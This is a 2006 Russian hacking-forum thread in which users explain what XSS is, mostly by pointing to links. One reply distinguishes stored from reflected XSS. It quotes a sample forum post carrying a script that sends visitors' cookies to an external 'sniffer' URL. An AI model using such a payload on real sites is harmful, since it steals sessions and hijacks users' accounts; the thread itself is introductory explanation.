Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Что такое ксс, и с чем его едят? (https://forum.antichat.xyz/showthread.php?t=24312)

MC_Brute 22.09.2006 14:45
Что такое ксс, и с чем его едят?
 
Думаю из названия понятно. Надеюсь на вашу помощь!

Ksander 22.09.2006 14:58
Если коротко, то

XSS(активные и пассивные)

Уязвимости класса xss в сущности сводятся к тому, что пользователь может внедрить в страницу произвольный html-код. Это может случиться если фильтрация вводимых символов организованна некорректно(или её вопще нет).
Часто подобные аттаки организуются через любые поля ввода.Эти уязвимости делятся на две подкатегории: активный xss и пассивный xss.
Ативный xss-исполнение html кода, без "активных" действий пользователя. На примере форума: плохой программист не позаботился о фильтрации html тегов,
тогда злой дядька пишет сообщение
"Привет, какой классный у вас форум <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>"
в результате просмотра этого сообщения пользователем его cookie "уплывут" на "сниффер".
Перейдём к пассивному XSS. Отличается от активного он тем, что для успешного проведения атаки пользователь должен пройти по специально составленной, предложенной ему ссылке, ведущей куда-либо на том же сайте откуда мы хотим увести куки. Обычно для такой атаки используются адресная строка браузера,поле search(работающее методом get),либо фрейм.





Вот тебе ссылка, почитай, там все подробно написано http://www.webfile.ru/1117230

Вот еще http://paradox.3bb.ru/viewtopic.php?pid=43

p.s.а самая главная ссылка это вот

http://www.google.com.ua/search?hl=uk&ie=windows-1251&q=%C2%F1%E5+%EE+XSS&meta=

и

www.google.com\ru\ua
www.ya.ru
www.rambler.ru
www.aport.ru ;)

BlackDog 22.09.2006 16:05
Rtfm!



======

Пока устный выговор. Впредь пиши по сути дела
DRON-ANARCHY

Kaban 22.09.2006 18:36
вот ссылки на статьи:
http://www.forum.antichat.ru/thread11807.html

http://antichat.ru/crackchat/HTML/

http://forum.antichat.ru/thread20140.html

читай и учи!!! =)

$n@ke 23.09.2006 01:34
да, и еще одна:
http://www2.packetstormsecurity.org

Практика - Лучший учитель...имхо

max_pain89 23.09.2006 18:43
Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/

А редактировать CSS можно с помощью "офисной утилиты" FrontPage

Ну а если не правельно, то х с ним.

Digimortal 23.09.2006 23:52
Цитата:
Сообщение от max_pain89
Если я тебя правельно понял, то вот http://www.w3.org/Style/CSS/

А редактировать CSS можно с помощью "офисной утилиты" FrontPage

Ну а если не правельно, то х с ним.
Наверно все-таки неправильно...

Если вопрос по каск. таблицам - то это не в тот раздел тема (да и вообще, не в тот форум...)

.Slip 23.09.2006 23:58
На вопрос ответили с избытком. Привели много ссылок. Теперь только читать и понимать, а тут уже помочь никак. Тема закрыта.
ЗЫ Если будет очень уж большая неоюходимость здесь отпостить, пишите в ПМ, тему открою


Время: 18:49